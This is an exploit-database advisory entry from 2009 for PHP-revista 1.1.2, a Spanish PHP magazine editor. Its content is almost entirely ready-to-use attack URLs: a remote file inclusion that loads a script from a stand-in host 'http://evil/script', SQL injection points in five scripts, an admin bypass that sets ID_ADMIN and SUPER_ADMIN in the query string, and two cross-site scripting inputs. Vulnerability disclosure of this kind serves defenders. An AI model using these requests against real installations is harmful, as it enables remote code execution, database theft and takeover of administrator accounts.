PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting
Author: SirDarckCat
type: webapps
platform: php
port:
date_added: 2009-04-13
date_updated:
verified: 1
codes: OSVDB-28452;CVE-2006-4608;OSVDB-28451;CVE-2006-4607;OSVDB-28450;CVE-2006-4606;OSVDB-28449;OSVDB-28448;OSVDB-28447;OSVDB-28446;OSVDB-28445;OSVDB-28443;CVE-2006-4605
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comrevista-1.1.2.tgz
Discovered by Sirdarckcat from elhacker.net
------------------------------------------------------------------------
------------
Revista 1.1.2
http://php-revista.sourceforge.org
------------------------------------------------------------------------
------------
Revista is a simple spanish PHP magazine editor.
It was done by php.org.mx
It suffers of multiple vulnerabilities.
------------------------------------------------------------------------
------------
Remote File Inclusion
http://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script
------------------------------------------------------------------------
------------
SQLi
http://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]
http://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]
http://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]
http://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]
http://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]
------------------------------------------------------------------------
------------
Credentials Bypass
http://revista/admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1
------------------------------------------------------------------------
------------
XSS
http://revista/estilo/[ANY STYLE]/busqueda.php?cadena=<XSS>
http://revista/estilo/[ANY STYLE]/lista.php?email=<XSS>
------------------------------------------------------------------------
# milw0rm.com [2009-04-14]